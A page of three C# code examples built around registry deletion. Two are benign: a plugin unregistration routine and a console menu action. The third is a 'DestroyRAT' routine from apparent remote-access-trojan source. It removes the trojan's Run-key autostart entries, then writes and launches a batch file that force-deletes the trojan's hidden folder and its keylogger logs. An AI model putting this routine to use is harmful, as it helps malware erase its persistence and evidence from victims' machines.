Пример #1
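        /// <summary>
        /// Removes this plugin's registration from the registry: every value
        /// listed in <c>PluginSettings</c> is deleted from the plugin's own
        /// subkey, and then that subkey itself is deleted.
        /// </summary>
        /// <remarks>
        /// The subkey is <c>PluginKeyWow\PluginGuid</c> on an x64 platform and
        /// <c>PluginKey\PluginGuid</c> otherwise, inside the hive given by
        /// <c>PluginHive</c>.
        /// </remarks>
        public static void UnregisterServer()
        {
            //  Registry helper bound to the hive the plugin is registered in
            RegistryTools registry = new RegistryTools()
            {
                Hive = PluginHive
            };

            //  This is a 32-bit plugin, so on a 64-bit platform the
            //  registration is addressed through the WoW emulation key
            string parentKey =
                (Platform.GetPlatform() == PlatformType.X64) ? PluginKeyWow : PluginKey;
            string key = String.Format(@"{0}\{1}", parentKey, PluginGuid);

            //  Delete each plugin setting from the plugin's own subkey
            foreach (var setting in PluginSettings)
            {
                registry.DeleteValue(key, setting.Key);
            }

            //  Delete only the subkey the values were removed from. The
            //  original passed PluginKey here, which is the parent path that
            //  `key` is built from and ignores the WoW branch chosen above;
            //  removing the parent goes beyond this plugin's registration.
            //  NOTE(review): RegistryTools.DeleteKey is not visible here --
            //  confirm whether it deletes recursively.
            registry.DeleteKey(key);
        }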
Пример #2
        }                  //Finish

        /// <summary>
        /// Console menu action: prints a heading, obtains a registry path and
        /// a value name from <c>SetPath()</c> and <c>SetValueName()</c>, and
        /// prints whatever <c>registro.DeleteValue</c> returns for that pair.
        /// </summary>
        public void DeleteValue()
        {
            // Heading, drawn at column 45, row 2
            Console.SetCursorPosition(45, 2);
            Console.WriteLine("Eliminar una Llave y los valores que almacena");
            Console.WriteLine("");

            // Target of the deletion; the path is read before the value name
            string targetPath  = SetPath();
            string targetValue = SetValueName();

            // Run the deletion and show its result to the operator
            var outcome = registro.DeleteValue(targetPath, targetValue);
            Console.WriteLine(outcome);
        }
Пример #3
        /// <summary>
        /// Self-removal routine of the sample. When <paramref name="destroy"/>
        /// is true it removes its autostart entries, writes a batch script
        /// that deletes the files in two configured directories, launches
        /// that script and terminates the current process.
        /// </summary>
        /// <param name="destroy">
        /// Must be true for anything to happen; with the default (false) the
        /// method returns without doing anything.
        /// </param>
        /// <remarks>
        /// Observable artifacts, as written in this block: deletion of the
        /// value named <c>config.NAME_REG</c> under the HKLM and HKCU
        /// <c>...\CurrentVersion\Run</c> keys, the file
        /// <c>C:\Users\Public\error.bat</c> being deleted and rewritten, a
        /// process started from that batch file, and exit code 1 from the
        /// calling process. The batch file is not removed by this method, so
        /// it stays on disk unless something else deletes it.
        /// </remarks>
        public static void DestroyRAT(bool destroy = false)
        {
            if (destroy)
            {
                Console.WriteLine("\n==>[DESTROY RAT] En proceso...\n");
                // Fixed, world-writable location of the clean-up script
                const string pathbat = @"C:\Users\Public" + @"\" + "error.bat";

                try {
                    Console.WriteLine("\n[StartUp] Eliminando registros de arranque...\n");

                    // Remove the autostart (Run key) value from both the
                    // machine-wide and the per-user hive.
                    // NOTE(review): the paths carry a "Computer\" prefix; how
                    // RegistryTools parses that is not visible here -- confirm.
                    RegistryTools R     = new RegistryTools();
                    const string  PathA = @"Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run";
                    Console.WriteLine("[StartUp] Se eliminó del registro = " + R.DeleteValue(PathA, config.NAME_REG));
                    const string Path = @"Computer\HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run";
                    Console.WriteLine("[StartUp] Se eliminó del registro = " + R.DeleteValue(Path, config.NAME_REG));
                } catch {
                    // Any failure (for example missing rights on HKLM) is only
                    // reported on the console; the routine carries on.
                    Console.WriteLine("Error al eliminar del registro");
                }

                Console.WriteLine("\n[StartUp] Finish\n");


                // Refresh the bat: drop any previous copy of the script
                try {
                    File.Delete(pathbat);
                } catch {
                    // Errors are swallowed silently
                }

                const string bat =                                    // Batch script that will delete the RAT
                                   "@echo off\n" +
                                   @"cd " + config.PATH_OCUL + "\n" + // RAT path
                                   @"timeout /t 1 /NOBREAK >null" + "\n" +
                                   @"del /f /q /S *.*" + "\n" +
                                   @"cd " + config.PATH_LOG + "\n" + // Keylogger path
                                   @"del /f /q /S *.* ";
                // Create the bat
                try {
                    Console.WriteLine("Crea Bat ");
                    File.WriteAllText(pathbat, bat);
                } catch {
                    // Every write failure gets the same "already exists"
                    // message, whatever the actual cause
                    Console.WriteLine("El archivo bat, ya existe");
                }

                // Launch the bat file to perform the deletion.
                // psi is configured but never passed to Process.Start in this
                // block; the script is started by path alone.
                ProcessStartInfo psi = new ProcessStartInfo();
                psi.UseShellExecute = false;
                psi.FileName        = pathbat;

                //Process.Start(psi);
                Process.Start(pathbat);

                // "Closes Telegram" (original comment); the call terminates
                // the current process with exit code 1
                Environment.Exit(1);


                //// New Name *.pdb
                //string exeName = config.NAME_EXE;
                //exeName = exeName.Substring(0, exeName.Length - 4);

                //Console.WriteLine("\n==>[Troyano] Finish\n");
            }
        }